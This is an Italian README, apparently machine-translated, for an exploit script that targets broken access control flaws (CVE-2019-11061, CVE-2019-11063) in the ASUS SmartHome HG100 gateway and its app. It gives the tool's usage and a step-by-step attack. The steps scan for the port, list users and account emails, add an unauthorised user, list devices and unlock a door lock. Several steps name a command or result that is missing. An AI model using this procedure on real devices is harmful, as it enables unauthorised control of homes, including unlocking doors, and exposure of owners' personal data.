
Exploit ASUS SmartHome per CVE-2019-11061 e CVE-2019-11063
CVE-2019-11061 : Controllo di accesso non funzionante in HG100
Prodotti interessati : ASUS SmartHome Gateway HG100 versione firmware < 4.00.09
CVE-2019-11063 : Controllo di accesso non funzionante nell'app SmartHome
Prodotti interessati : ASUS SmartHome Android APP versione < 3.0.45_190701
Se l'attaccante si trova sulla stessa rete interna dell'HG100 o di un dispositivo mobile con l'APP companion (android o iPhone). L'attaccante può inviare loro richieste di controllo.
usage: exploit.py scan [-h] [-v] target_ip
scan exploitable port
positional arguments:
target_ip scan ip
optional arguments:
-h, --help show this help message and exit
-v show account email list
usage: exploit.py cmd [-h]
(-u | -l | -s device_id | -c device_id status | -a username)
[--user username] [--new-user username] [-v]
target
send command to target
positional arguments:
target <target-ip>:<port>
optional arguments:
-h, --help show this help message and exit
-u, --list-user list all user in device
-l, --list-device list all device status
-s device_id, --device-status device_id
list device status
-c device_id status, --device-control device_id status
control device status
-a username, --add-user username
add a user to device
--user username assign user for cmd
--new-user username create a new user for cmd
-v show account email list
$ ./exploit.py cmd https://10.42.50.166:8083 -l
Scansiona la porta sfruttabile del dispositivo mobile (con l'APP companion per android o iPhone installata) :
P.S. L'opzione -v elencherà gli utenti aggiunti all'HG100.
oppure
Scansiona la porta sfruttabile dell'HG100 :
Ottieni tutti gli utenti aggiunti all'HG100:

oppure aggiungine uno nuovo:
Nota: usa https://10.42.50.166:8083 per l'argomento "cmd".
Per esempio:
$ ./exploit.py cmd https://10.42.50.166:8083 -u
Ottieni le informazioni di tutti i dispositivi sotto lo SmartHome Gateway:
P.S. Se l'opzione --user non è impostata, verrà selezionato automaticamente il primo utente nell'HG100. (Perché non è necessaria alcuna password)
Confronto con l'app:
Controlla (sblocca) il DoorLock.
P.S. il valore 1028 si ottiene dall'opzione -l (passo 3).
Risultato:
